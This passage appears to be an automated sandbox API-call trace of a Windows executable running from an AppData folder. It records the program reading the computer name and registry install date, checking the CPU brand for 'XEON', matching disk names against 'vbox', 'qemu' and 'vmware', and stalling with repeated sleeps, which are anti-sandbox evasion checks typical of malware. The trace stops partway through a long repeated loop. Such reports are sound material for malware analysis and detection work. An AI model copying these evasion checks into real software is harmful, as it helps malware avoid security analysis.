0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1045 start_va = 0x2860000 end_va = 0x2a21fff entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 1046 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1047 start_va = 0x2860000 end_va = 0x2a21fff entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 1048 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1049 start_va = 0x2860000 end_va = 0x2a21fff entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Thread: id = 28 os_tid = 0x710 [0200.650] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x401646, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x174 [0200.650] CloseHandle (hObject=0x174) returned 1 [0200.650] RtlExitUserThread (Status=0x0) Thread: id = 29 os_tid = 0x58c Thread: id = 30 os_tid = 0x2d0 [0200.696] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0200.697] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe\" " [0200.697] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0200.697] GetComputerNameA (in: lpBuffer=0x1eafcc4, nSize=0x1eafd50 | out: lpBuffer="LHNIWSJ", nSize=0x1eafd50) returned 1 [0200.697] lstrlenA (lpString="LHNIWSJ") returned 7 [0200.697] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x1eafd48 | out: phkResult=0x1eafd48*=0x174) returned 0x0 [0200.697] RegQueryValueExA (in: hKey=0x174, lpValueName="InstallDate", lpReserved=0x0, lpType=0x0, lpData=0x1eafd44, lpcbData=0x1eafd50*=0x4 | out: lpType=0x0, lpData=0x1eafd44*=0x41, lpcbData=0x1eafd50*=0x4) returned 0x0 [0200.698] RegCloseKey (hKey=0x174) returned 0x0 [0200.698] wsprintfA (in: param_1=0x1eafea8, param_2="%8X" | out: param_1="98F9CE91") returned 8 [0200.698] GetTempPathA (in: nBufferLength=0x100, lpBuffer=0x1eafda8 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned 0x25 [0200.698] lstrcatA (in: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\", lpString2="98F9CE91" | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91" [0200.698] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91") returned 45 [0200.698] mbstowcs (in: _Dest=0x23c85a8, _Source="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91", _MaxCount=0x2e | out: _Dest="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91") returned 0x2d [0200.698] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x2e [0200.698] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91", lpDst=0x23c8610, nSize=0x2e | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91") returned 0x2e [0200.698] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\98f9ce91"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.748] GetLastError () returned 0x2 [0200.757] wsprintfA (in: param_1=0x1eafeb4, param_2="%c%c%c%c" | out: param_1="Inte") returned 4 [0200.757] wsprintfA (in: param_1=0x1eafeb8, param_2="%c%c%c%c" | out: param_1="l (R") returned 4 [0200.758] wsprintfA (in: param_1=0x1eafebc, param_2="%c%c%c%c" | out: param_1=") Co") returned 4 [0200.758] wsprintfA (in: param_1=0x1eafec0, param_2="%c%c%c%c" | out: param_1="re(T") returned 4 [0200.758] wsprintfA (in: param_1=0x1eafec4, param_2="%c%c%c%c" | out: param_1="M) i") returned 4 [0200.758] wsprintfA (in: param_1=0x1eafec8, param_2="%c%c%c%c" | out: param_1="5-75") returned 4 [0200.758] wsprintfA (in: param_1=0x1eafecc, param_2="%c%c%c%c" | out: param_1="00 C") returned 4 [0200.758] wsprintfA (in: param_1=0x1eafed0, param_2="%c%c%c%c" | out: param_1="PU @") returned 4 [0200.758] wsprintfA (in: param_1=0x1eafed4, param_2="%c%c%c%c" | out: param_1=" 3.4") returned 4 [0200.758] wsprintfA (in: param_1=0x1eafed8, param_2="%c%c%c%c" | out: param_1="0GHz") returned 4 [0200.758] wsprintfA (in: param_1=0x1eafedc, param_2="%c%c%c%c" | out: param_1="") returned 4 [0200.758] wsprintfA (in: param_1=0x1eafee0, param_2="%c%c%c%c" | out: param_1="") returned 4 [0200.758] strstr (_Str="INTEL (R) CORE(TM) I5-7500 CPU @ 3.40GHZ", _SubStr="XEON") returned 0x0 [0200.758] SetupDiGetClassDevsA (ClassGuid=0x1eafe90*(Data1=0x4d36e967, Data2=0xe325, Data3=0x11ce, Data4=([0]=0xbf, [1]=0xc1, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0xe1, [6]=0x3, [7]=0x18)), Enumerator=0x0, hwndParent=0x0, Flags=0x2) returned 0x5987a8 [0200.814] SetupDiEnumDeviceInfo (in: DeviceInfoSet=0x5987a8, MemberIndex=0x0, DeviceInfoData=0x1eafea0 | out: DeviceInfoData=0x1eafea0) returned 1 [0200.814] SetupDiGetDeviceRegistryPropertyA (in: DeviceInfoSet=0x5987a8, DeviceInfoData=0x1eafea0, Property=0xc, PropertyRegDataType=0x1eafec8, PropertyBuffer=0x0, PropertyBufferSize=0x0, RequiredSize=0x1eafeec | out: PropertyRegDataType=0x1eafec8, PropertyBuffer=0x0, RequiredSize=0x1eafeec) returned 0 [0200.815] SetupDiGetDeviceRegistryPropertyA (in: DeviceInfoSet=0x5987a8, DeviceInfoData=0x1eafea0, Property=0xc, PropertyRegDataType=0x1eafec8, PropertyBuffer=0x23c8618, PropertyBufferSize=0xb, RequiredSize=0x1eafeec | out: PropertyRegDataType=0x1eafec8, PropertyBuffer=0x23c8618, RequiredSize=0x1eafeec) returned 1 [0200.815] StrStrIA (lpFirst="WD5000AVDS", lpSrch="vbox") returned 0x0 [0200.818] StrStrIA (lpFirst="WD5000AVDS", lpSrch="qemu") returned 0x0 [0200.818] StrStrIA (lpFirst="WD5000AVDS", lpSrch="vmware") returned 0x0 [0200.818] StrStrIA (lpFirst="WD5000AVDS", lpSrch="virtual hd") returned 0x0 [0200.818] SetupDiDestroyDeviceInfoList (DeviceInfoSet=0x5987a8) returned 1 [0200.824] GetTickCount () returned 0x19073 [0200.824] Sleep (dwMilliseconds=0x1f4) [0201.646] Sleep (dwMilliseconds=0x1f4) [0202.199] Sleep (dwMilliseconds=0x1f4) [0202.707] Sleep (dwMilliseconds=0x1f4) [0203.216] Sleep (dwMilliseconds=0x1f4) [0203.733] Sleep (dwMilliseconds=0x1f4) [0204.247] Sleep (dwMilliseconds=0x1f4) [0204.763] Sleep (dwMilliseconds=0x1f4) [0205.265] Sleep (dwMilliseconds=0x1f4) [0205.778] Sleep (dwMilliseconds=0x1f4) [0206.294] SwitchToThread () returned 0 [0206.294] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.295] SwitchToThread () returned 0 [0206.295] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.295] SwitchToThread () returned 0 [0206.295] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.295] SwitchToThread () returned 0 [0206.295] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.295] SwitchToThread () returned 0 [0206.295] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.295] SwitchToThread () returned 0 [0206.295] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.295] SwitchToThread () returned 0 [0206.295] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.296] SwitchToThread () returned 0 [0206.296] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.296] SwitchToThread () returned 0 [0206.296] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.296] SwitchToThread () returned 0 [0206.296] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.296] SwitchToThread () returned 0 [0206.296] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.296] SwitchToThread () returned 0 [0206.296] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.296] SwitchToThread () returned 0 [0206.296] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.296] SwitchToThread () returned 0 [0206.296] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.296] SwitchToThread () returned 0 [0206.296] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.297] SwitchToThread () returned 0 [0206.297] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.297] SwitchToThread () returned 0 [0206.297] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.297] SwitchToThread () returned 0 [0206.297] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.297] SwitchToThread () returned 0 [0206.297] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.297] SwitchToThread () returned 0 [0206.297] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.297] SwitchToThread () returned 0 [0206.297] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.297] SwitchToThread () returned 0 [0206.297] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.297] SwitchToThread () returned 0 [0206.297] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.298] SwitchToThread () returned 0 [0206.298] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.298] SwitchToThread () returned 0 [0206.298] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.298] SwitchToThread () returned 0 [0206.298] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.298] SwitchToThread () returned 0 [0206.298] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.298] SwitchToThread () returned 0 [0206.298] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.298] SwitchToThread () returned 0 [0206.298] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.298] SwitchToThread () returned 0 [0206.298] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.298] SwitchToThread () returned 0 [0206.298] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.299] SwitchToThread () returned 0 [0206.299] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.299] SwitchToThread () returned 0 [0206.299] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.299] SwitchToThread () returned 0 [0206.299] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.299] SwitchToThread () returned 0 [0206.299] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.299] SwitchToThread () returned 0 [0206.299] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.299] SwitchToThread () returned 0 [0206.299] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.299] SwitchToThread () returned 0 [0206.299] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.299] SwitchToThread () returned 0 [0206.299] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.299] SwitchToThread () returned 0 [0206.300] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.300] SwitchToThread () returned 0 [0206.300] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.300] SwitchToThread () returned 0 [0206.300] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.300] SwitchToThread () returned 0 [0206.300] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.300] SwitchToThread () returned 0 [0206.300] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.300] SwitchToThread () returned 0 [0206.300] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.300] SwitchToThread () returned 0 [0206.300] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.300] SwitchToThread () returned 0 [0206.300] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.300] SwitchToThread () returned 0 [0206.301] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.301] SwitchToThread () returned 0 [0206.301] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.301] SwitchToThread () returned 0 [0206.301] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.301] SwitchToThread () returned 0 [0206.301] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.301] SwitchToThread () returned 0 [0206.301] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.301] SwitchToThread () returned 0 [0206.301] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.301] SwitchToThread () returned 0 [0206.301] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.301] SwitchToThread () returned 0 [0206.301] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.301] SwitchToThread () returned 0 [0206.301] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.302] SwitchToThread () returned 0 [0206.302] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.302] SwitchToThread () returned 0 [0206.302] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.302] SwitchToThread () returned 0 [0206.302] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.302] SwitchToThread () returned 0 [0206.302] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.302] SwitchToThread () returned 0 [0206.302] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.302] SwitchToThread () returned 0 [0206.302] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.302] SwitchToThread () returned 0 [0206.302] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.302] SwitchToThread () returned 0 [0206.302] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.303] SwitchToThread () returned 0 [0206.303] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.303] SwitchToThread () returned 0 [0206.303] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.303] SwitchToThread () returned 0 [0206.303] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.303] SwitchToThread () returned 0 [0206.303] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.303] SwitchToThread () returned 0 [0206.303] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.303] SwitchToThread () returned 0 [0206.303] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.303] SwitchToThread () returned 0 [0206.303] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.303] SwitchToThread () returned 0 [0206.303] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.304] SwitchToThread () returned 0 [0206.304] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.304] SwitchToThread () returned 0 [0206.304] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.304] SwitchToThread () returned 0 [0206.304] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.304] SwitchToThread () returned 0 [0206.304] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.304] SwitchToThread () returned 0 [0206.304] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.304] SwitchToThread () returned 0 [0206.304] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.304] SwitchToThread () returned 0 [0206.304] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.304] SwitchToThread () returned 0 [0206.304] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.305] SwitchToThread () returned 0 [0206.305] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.305] SwitchToThread () returned 0 [0206.305] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.305] SwitchToThread () returned 0 [0206.305] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.305] SwitchToThread () returned 0 [0206.305] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.305] SwitchToThread () returned 0 [0206.305] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.305] SwitchToThread () returned 0 [0206.305] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.305] SwitchToThread () returned 0 [0206.305] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.305] SwitchToThread () returned 0 [0206.305] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.306] SwitchToThread () returned 0 [0206.306] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.306] SwitchToThread () returned 0 [0206.306] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.306] SwitchToThread () returned 0 [0206.306] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.306] SwitchToThread () returned 0 [0206.306] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.306] SwitchToThread () returned 0 [0206.306] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.306] SwitchToThread () returned 0 [0206.306] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.306] SwitchToThread () returned 0 [0206.306] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.306] SwitchToThread () returned 0 [0206.306] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.307] SwitchToThread () returned 0 [0206.307] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.307] SwitchToThread () returned 0 [0206.307] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.307] SwitchToThread () returned 0 [0206.307] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.307] SwitchToThread () returned 0 [0206.307] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.307] SwitchToThread () returned 0 [0206.307] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.307] SwitchToThread () returned 0 [0206.307] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.307] SwitchToThread () returned 0 [0206.307] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.307] SwitchToThread () returned 0 [0206.307] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.308] SwitchToThread () returned 0 [0206.308] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.308] SwitchToThread () returned 0 [0206.308] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.308] SwitchToThread () returned 0 [0206.308] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.308] SwitchToThread () returned 0 [0206.308] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.308] SwitchToThread () returned 0 [0206.308] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.308] SwitchToThread () returned 0 [0206.308] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.308] SwitchToThread () returned 0 [0206.308] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.308] SwitchToThread () returned 0 [0206.308] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.309] SwitchToThread () returned 0 [0206.309] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.309] SwitchToThread () returned 0 [0206.309] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.309] SwitchToThread () returned 0 [0206.309] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.309] SwitchToThread () returned 0 [0206.309] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.309] SwitchToThread () returned 0 [0206.309] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.309] SwitchToThread () returned 0 [0206.309] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.310] SwitchToThread () returned 0 [0206.310] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.310] SwitchToThread () returned 0 [0206.310] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.310] SwitchToThread () returned 0 [0206.310] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.310] SwitchToThread () returned 0 [0206.310] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.310] SwitchToThread () returned 0 [0206.310] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.310] SwitchToThread () returned 0 [0206.310] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.310] SwitchToThread () returned 0 [0206.311] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.311] SwitchToThread () returned 0 [0206.311] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.311] SwitchToThread () returned 0 [0206.311] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.311] SwitchToThread () returned 0 [0206.311] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.311] SwitchToThread () returned 0 [0206.311] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.311] SwitchToThread () returned 0 [0206.311] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", 